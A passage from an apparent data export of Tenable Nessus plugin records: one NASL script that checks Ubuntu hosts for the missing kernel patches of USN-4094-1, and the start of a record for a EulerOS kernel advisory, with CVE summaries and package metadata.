Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(127889);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2018-13053\", \"CVE-2018-13093\", \"CVE-2018-13096\", \"CVE-2018-13097\", \"CVE-2018-13098\", \"CVE-2018-13099\", \"CVE-2018-13100\", \"CVE-2018-14609\", \"CVE-2018-14610\", \"CVE-2018-14611\", \"CVE-2018-14612\", \"CVE-2018-14613\", \"CVE-2018-14614\", \"CVE-2018-14615\", \"CVE-2018-14616\", \"CVE-2018-14617\", \"CVE-2018-16862\", \"CVE-2018-20169\", \"CVE-2018-20511\", \"CVE-2018-20856\", \"CVE-2018-5383\", \"CVE-2019-10126\", \"CVE-2019-1125\", \"CVE-2019-12614\", \"CVE-2019-12818\", \"CVE-2019-12819\", \"CVE-2019-12984\", \"CVE-2019-13233\", \"CVE-2019-13272\", \"CVE-2019-2024\", \"CVE-2019-2101\", \"CVE-2019-3846\");\n script_xref(name:\"USN\", value:\"4094-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS : Linux kernel vulnerabilities (USN-4094-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that the alarmtimer implementation in the Linux\nkernel contained an integer overflow vulnerability. A local attacker\ncould use this to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly track inode validations. An attacker could use\nthis to construct a malicious XFS image that, when mounted, could\ncause a denial of service (system crash). (CVE-2018-13093)\n\nWen Xu discovered that the f2fs file system implementation in the\nLinux kernel did not properly validate metadata. 
An attacker could use\nthis to construct a malicious f2fs image that, when mounted, could\ncause a denial of service (system crash). (CVE-2018-13097,\nCVE-2018-13099, CVE-2018-13100, CVE-2018-14614, CVE-2018-14616,\nCVE-2018-13096, CVE-2018-13098, CVE-2018-14615)\n\nWen Xu and Po-Ning Tseng discovered that btrfs file system\nimplementation in the Linux kernel did not properly validate metadata.\nAn attacker could use this to construct a malicious btrfs image that,\nwhen mounted, could cause a denial of service (system crash).\n(CVE-2018-14610, CVE-2018-14611, CVE-2018-14612, CVE-2018-14613,\nCVE-2018-14609)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux\nkernel did not properly handle malformed catalog data in some\nsituations. An attacker could use this to construct a malicious HFS+\nimage that, when mounted, could cause a denial of service (system\ncrash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache\nsubsystem of the Linux kernel did not properly initialize new files in\nsome situations. A local attacker could use this to expose sensitive\ninformation. (CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the\nLinux kernel did not properly handle size checks when handling an\nextra USB descriptor. A physically proximate attacker could use this\nto cause a denial of service (system crash). (CVE-2018-20169)\n\nIt was discovered that a use-after-free error existed in the block\nlayer subsystem of the Linux kernel when certain failure conditions\noccurred. A local attacker could possibly use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2018-20856)\n\nEli Biham and Lior Neumann discovered that the Bluetooth\nimplementation in the Linux kernel did not properly validate elliptic\ncurve parameters during Diffie-Hellman key exchange in some\nsituations. An attacker could use this to expose sensitive\ninformation. 
(CVE-2018-5383)\n\nIt was discovered that a heap buffer overflow existed in the Marvell\nWireless LAN device driver for the Linux kernel. An attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-10126)\n\nAndrei Vlad Lutas and Dan Lutas discovered that some x86 processors\nincorrectly handle SWAPGS instructions during speculative execution. A\nlocal attacker could use this to expose sensitive information (kernel\nmemory). (CVE-2019-1125)\n\nIt was discovered that the PowerPC dlpar implementation in the Linux\nkernel did not properly check for allocation errors in some\nsituations. A local attacker could possibly use this to cause a denial\nof service (system crash). (CVE-2019-12614)\n\nIt was discovered that a NULL pointer dereference vulnerabilty existed\nin the Near-field communication (NFC) implementation in the Linux\nkernel. An attacker could use this to cause a denial of service\n(system crash). (CVE-2019-12818)\n\nIt was discovered that the MDIO bus devices subsystem in the Linux\nkernel improperly dropped a device reference in an error condition,\nleading to a use-after-free. An attacker could use this to cause a\ndenial of service (system crash). (CVE-2019-12819)\n\nIt was discovered that a NULL pointer dereference vulnerability\nexisted in the Near-field communication (NFC) implementation in the\nLinux kernel. A local attacker could use this to cause a denial of\nservice (system crash). (CVE-2019-12984)\n\nJann Horn discovered a use-after-free vulnerability in the Linux\nkernel when accessing LDT entries in some situations. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-13233)\n\nJann Horn discovered that the ptrace implementation in the Linux\nkernel did not properly record credentials in some situations. 
A local\nattacker could use this to cause a denial of service (system crash) or\npossibly gain administrative privileges. (CVE-2019-13272)\n\nIt was discovered that the Empia EM28xx DVB USB device driver\nimplementation in the Linux kernel contained a use-after-free\nvulnerability when disconnecting the device. An attacker could use\nthis to cause a denial of service (system crash). (CVE-2019-2024)\n\nIt was discovered that the USB video device class implementation in\nthe Linux kernel did not properly validate control bits, resulting in\nan out of bounds buffer read. A local attacker could use this to\npossibly expose sensitive information (kernel memory). (CVE-2019-2101)\n\nIt was discovered that the Marvell Wireless LAN device driver in the\nLinux kernel did not properly validate the BSS descriptor. A local\nattacker could possibly use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2019-3846)\n\nIt was discovered that the Appletalk IP encapsulation driver in the\nLinux kernel did not properly prevent kernel addresses from being\ncopied to user space. A local attacker with the CAP_NET_ADMIN\ncapability could use this to expose sensitive information.\n(CVE-2018-20511).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4094-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-3846\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Polkit pkexec helper PTRACE_TRACEME local root exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-lowlatency\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-oem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-oracle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke-4.15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-oem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-oracle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2020 Canonical, Inc. / NASL script (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 18.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-13053\", \"CVE-2018-13093\", \"CVE-2018-13096\", \"CVE-2018-13097\", \"CVE-2018-13098\", \"CVE-2018-13099\", \"CVE-2018-13100\", \"CVE-2018-14609\", \"CVE-2018-14610\", \"CVE-2018-14611\", \"CVE-2018-14612\", \"CVE-2018-14613\", \"CVE-2018-14614\", \"CVE-2018-14615\", \"CVE-2018-14616\", \"CVE-2018-14617\", \"CVE-2018-16862\", \"CVE-2018-20169\", \"CVE-2018-20511\", \"CVE-2018-20856\", \"CVE-2018-5383\", \"CVE-2019-10126\", \"CVE-2019-1125\", \"CVE-2019-12614\", \"CVE-2019-12818\", \"CVE-2019-12819\", \"CVE-2019-12984\", \"CVE-2019-13233\", \"CVE-2019-13272\", \"CVE-2019-2024\", \"CVE-2019-2101\", \"CVE-2019-3846\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-4094-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-1021-oracle\", pkgver:\"4.15.0-1021.23~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-1040-gcp\", pkgver:\"4.15.0-1040.42~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-1055-azure\", pkgver:\"4.15.0-1055.60\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-58-generic\", pkgver:\"4.15.0-58.64~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-58-generic-lpae\", pkgver:\"4.15.0-58.64~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-58-lowlatency\", pkgver:\"4.15.0-58.64~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", 
pkgname:\"linux-image-azure\", pkgver:\"4.15.0.1055.58\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-gcp\", pkgver:\"4.15.0.1040.54\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-hwe-16.04\", pkgver:\"4.15.0.58.79\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-lpae-hwe-16.04\", pkgver:\"4.15.0.58.79\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-gke\", pkgver:\"4.15.0.1040.54\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-lowlatency-hwe-16.04\", pkgver:\"4.15.0.58.79\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-oem\", pkgver:\"4.15.0.58.79\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-oracle\", pkgver:\"4.15.0.1021.15\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-virtual-hwe-16.04\", pkgver:\"4.15.0.58.79\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1021-oracle\", pkgver:\"4.15.0-1021.23\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1040-gcp\", pkgver:\"4.15.0-1040.42\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1040-gke\", pkgver:\"4.15.0-1040.42\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1042-kvm\", pkgver:\"4.15.0-1042.42\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1043-raspi2\", pkgver:\"4.15.0-1043.46\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1050-oem\", pkgver:\"4.15.0-1050.57\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1060-snapdragon\", pkgver:\"4.15.0-1060.66\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-58-generic\", pkgver:\"4.15.0-58.64\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-58-generic-lpae\", pkgver:\"4.15.0-58.64\")) flag++;\nif (ubuntu_check(osver:\"18.04\", 
pkgname:\"linux-image-4.15.0-58-lowlatency\", pkgver:\"4.15.0-58.64\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-gcp\", pkgver:\"4.15.0.1040.42\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-generic\", pkgver:\"4.15.0.58.60\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.15.0.58.60\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-gke\", pkgver:\"4.15.0.1040.43\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-gke-4.15\", pkgver:\"4.15.0.1040.43\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-kvm\", pkgver:\"4.15.0.1042.42\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.15.0.58.60\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-oem\", pkgver:\"4.15.0.1050.54\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-oracle\", pkgver:\"4.15.0.1021.24\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-raspi2\", pkgver:\"4.15.0.1043.41\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-snapdragon\", pkgver:\"4.15.0.1060.63\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-virtual\", pkgver:\"4.15.0.58.60\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.15-azure / linux-image-4.15-gcp / etc\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-10T08:57:07", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - An information-leak vulnerability was found in 
the\n kernel when it truncated a file to a smaller size which\n consisted of an inline extent that was compressed. The\n data between the new file size and the old file size\n was not discarded and the number of bytes used by the\n inode were not correctly decremented, which gave the\n wrong report for callers of the stat(2) syscall. This\n wasted metadata space and allowed for the truncated\n data to be leaked, and data corruption or loss to\n occur. A caller of the clone ioctl could exploit this\n flaw by using only standard file-system operations\n without root access to read the truncated\n data.(CVE-2015-8374)\n\n - crypto/pcrypt.c in the Linux kernel, before 4.14.13,\n mishandles freeing instances, allowing a local user\n able to access the AF_ALG-based AEAD interface\n (CONFIG_CRYPTO_USER_API_AEAD) and pcrypt\n (CONFIG_CRYPTO_PCRYPT) to cause a denial of service\n (kfree of an incorrect pointer) or possibly have\n unspecified other impact by executing a crafted\n sequence of system calls. Due to the nature of the\n flaw, privilege escalation cannot be fully ruled out,\n although we believe it is unlikely.(CVE-2017-18075)\n\n - An elevation of privilege vulnerability in the Qualcomm\n Wi-Fi driver could enable a local malicious application\n to execute arbitrary code within the context of the\n kernel. This issue is rated as High because it first\n requires compromising a privileged process. Product:\n Android. Versions: N/A. Android ID: A-32835279.\n References: QC-CR#1096945.(CVE-2017-0523)\n\n - The saa7164_bus_get function in\n drivers/media/pci/saa7164/saa7164-bus.c in the Linux\n kernel through 4.10.14 allows local users to cause a\n denial of service (out-of-bounds array access) or\n possibly have unspecified other impact by changing a\n certain sequence-number value, aka a 'double fetch'\n vulnerability.(CVE-2017-8831)\n\n - A flaw was found in the way the Linux kernel's splice()\n system call validated its parameters. 
On certain file\n systems, a local, unprivileged user could use this flaw\n to write past the maximum file size, and thus crash the\n system.(CVE-2014-7822)\n\n - The vc4_get_bcl function in\n drivers/gpu/drm/vc4/vc4_gem.c in the VideoCore DRM\n driver in the Linux kernel before 4.9.7 does not set an\n errno value upon certain overflow detections allowing\n local users to cause a denial of service (incorrect\n pointer dereference and OOPS) via inconsistent size\n values in a VC4_SUBMIT_CL ioctl call.(CVE-2017-5577)\n\n - In fs/ocfs2/cluster/nodemanager.c in the Linux kernel\n before 4.15, local users can cause a denial of service\n (NULL pointer dereference and BUG) because a required\n mutex is not used.(CVE-2017-18216)\n\n - A race condition issue leading to a use-after-free flaw\n was found in the way the raw packet sockets\n implementation in the Linux kernel networking subsystem\n handled synchronization while creating the TPACKET_V3\n ring buffer. A local user able to open a raw packet\n socket (requires the CAP_NET_RAW capability) could use\n this flaw to elevate their privileges on the\n system.(CVE-2016-8655)\n\n - An exploitable memory corruption flaw was found in the\n Linux kernel. The append path can be erroneously\n switched from UFO to non-UFO in ip_ufo_append_data()\n when building an UFO packet with MSG_MORE option. If\n unprivileged user namespaces are available, this flaw\n can be exploited to gain root\n privileges.(CVE-2017-1000112)\n\n - A security flaw was found in the Linux kernel in a way\n that the cleancache subsystem clears an inode after the\n final file truncation (removal). 
The new file created\n with the same inode may contain leftover pages from\n cleancache and the old file data instead of the new\n one.(CVE-2018-16862)\n\n - arch/arm64/ include /asm/pgtable.h in the Linux kernel\n before 3.15-rc5-next-20140519, as used in Android\n before 2016-07-05 on Nexus 5X and 6P devices,\n mishandles execute-only pages, which allows attackers\n to gain privileges via a crafted application, aka\n Android internal bug 28557020.(CVE-2014-9803)\n\n - A heap-buffer overflow vulnerability was found in the\n arcmsr_iop_message_xfer() function in\n 'drivers/scsi/arcmsr/arcmsr_hba.c' file in the Linux\n kernel through 4.8.2. The function does not restrict a\n certain length field, which allows local users to gain\n privileges or cause a denial of service via an\n ARCMSR_MESSAGE_WRITE_WQBUFFER control code. This can\n potentially cause kernel heap corruption and arbitrary\n kernel code execution.(CVE-2016-7425)\n\n - An issue was discovered in the Linux kernel before\n 4.18.11. 
The ipddp_ioctl function in\n drivers/net/appletalk/ipddp.c allows local users to\n obtain sensitive kernel address information by\n leveraging CAP_NET_ADMIN to read the ipddp_route dev\n and next fields via an SIOCFINDIPDDPRT ioctl\n call.(CVE-2018-20511)\n\n - A memory leak in the irda_bind function in\n net/irda/af_irda.c in the Linux kernel, through 4.16,\n allows local users to cause a denial of service due to\n a memory consumption by repeatedly binding an AF_IRDA\n socket.(CVE-2018-6554)\n\n - sound/core/timer.c in the Linux kernel before 4.4.1\n employs a locking approach that does not consider slave\n timer instances, which allows local users to cause a\n denial of service (race condition, use-after-free, and\n system crash) via a crafted ioctl\n call.(CVE-2016-2547)\n\n - Buffer overflow in the complete_emulated_mmio function\n in arch/x86/kvm/x86.c in the Linux kernel before 3.13.6\n allows guest OS users to execute arbitrary code on the\n host OS by leveraging a loop that triggers an invalid\n memory copy affecting certain cancel_work_item\n data.(CVE-2014-0049)\n\n - An issue was discovered in the F2FS filesystem code in\n the Linux kernel in fs/f2fs/inode.c. A denial of\n service due to a slab out-of-bounds read can occur for\n a crafted f2fs filesystem image in which FI_EXTRA_ATTR\n is set in an inode.(CVE-2018-13098)\n\n - A vulnerability was found in the Linux kernel where\n having malicious IP options present would cause the\n ipv4_pktinfo_prepare() function to drop/free the dst.\n This could result in a system crash or possible\n privilege escalation.(CVE-2017-5970)\n\n - In the Linux kernel's vmw_gb_surface_define_ioctl()\n function, in 'drivers/gpu/drm/vmwgfx/vmwgfx_surface.c'\n file, a 'req->mip_levels' is a user-controlled value\n which is later used as a loop count limit. 
This allows\n local unprivileged user to cause a denial of service by\n a kernel lockup via a crafted ioctl call for a\n '/dev/dri/renderD*' device.(CVE-2017-7346)\n\n - It was found that the NFSv4 server in the Linux kernel\n did not properly validate layout type when processing\n NFSv4 pNFS LAYOUTGET and GETDEVICEINFO operands. A\n remote attacker could use this flaw to soft-lockup the\n system and thus cause denial of\n service.(CVE-2017-8797)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-13T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1482)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655", "CVE-2018-13098", "CVE-2014-7822", "CVE-2017-5577", "CVE-2017-7346", "CVE-2017-18075", "CVE-2017-5970", "CVE-2017-0523", "CVE-2017-8831", "CVE-2016-2547", "CVE-2018-16862", "CVE-2016-7425", "CVE-2017-1000112", "CVE-2014-9803", "CVE-2015-8374", "CVE-2014-0049", "CVE-2017-18216", "CVE-2017-8797", "CVE-2018-6554", "CVE-2018-20511"], "modified": "2019-05-13T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-devel", "cpe:/o:huawei:euleros:uvp:3.0.1.0", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs"], "id": "EULEROS_SA-2019-1482.NASL", "href": "https://www.tenable.com/plugins/nessus/124806", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n 
script_id(124806);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/09\");\n\n script_cve_id(\n \"CVE-2014-0049\",\n \"CVE-2014-7822\",\n \"CVE-2014-9803\",\n \"CVE-2015-8374\",\n \"CVE-2016-2547\",\n \"CVE-2016-7425\",\n \"CVE-2016-8655\",\n \"CVE-2017-0523\",\n \"CVE-2017-1000112\",\n \"CVE-2017-18075\",\n \"CVE-2017-18216\",\n \"CVE-2017-5577\",\n \"CVE-2017-5970\",\n \"CVE-2017-7346\",\n \"CVE-2017-8797\",\n \"CVE-2017-8831\",\n \"CVE-2018-13098\",\n \"CVE-2018-16862\",\n \"CVE-2018-20511\",\n \"CVE-2018-6554\"\n );\n script_bugtraq_id(\n 65909,\n 72347\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1482)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - An information-leak vulnerability was found in the\n kernel when it truncated a file to a smaller size which\n consisted of an inline extent that was compressed. The\n data between the new file size and the old file size\n was not discarded and the number of bytes used by the\n inode were not correctly decremented, which gave the\n wrong report for callers of the stat(2) syscall. This\n wasted metadata space and allowed for the truncated\n data to be leaked, and data corruption or loss to\n occur. 
A caller of the clone ioctl could exploit this\n flaw by using only standard file-system operations\n without root access to read the truncated\n data.(CVE-2015-8374)\n\n - crypto/pcrypt.c in the Linux kernel, before 4.14.13,\n mishandles freeing instances, allowing a local user\n able to access the AF_ALG-based AEAD interface\n (CONFIG_CRYPTO_USER_API_AEAD) and pcrypt\n (CONFIG_CRYPTO_PCRYPT) to cause a denial of service\n (kfree of an incorrect pointer) or possibly have\n unspecified other impact by executing a crafted\n sequence of system calls. Due to the nature of the\n flaw, privilege escalation cannot be fully ruled out,\n although we believe it is unlikely.(CVE-2017-18075)\n\n - An elevation of privilege vulnerability in the Qualcomm\n Wi-Fi driver could enable a local malicious application\n to execute arbitrary code within the context of the\n kernel. This issue is rated as High because it first\n requires compromising a privileged process. Product:\n Android. Versions: N/A. Android ID: A-32835279.\n References: QC-CR#1096945.(CVE-2017-0523)\n\n - The saa7164_bus_get function in\n drivers/media/pci/saa7164/saa7164-bus.c in the Linux\n kernel through 4.10.14 allows local users to cause a\n denial of service (out-of-bounds array access) or\n possibly have unspecified other impact by changing a\n certain sequence-number value, aka a 'double fetch'\n vulnerability.(CVE-2017-8831)\n\n - A flaw was found in the way the Linux kernel's splice()\n system call validated its parameters. 
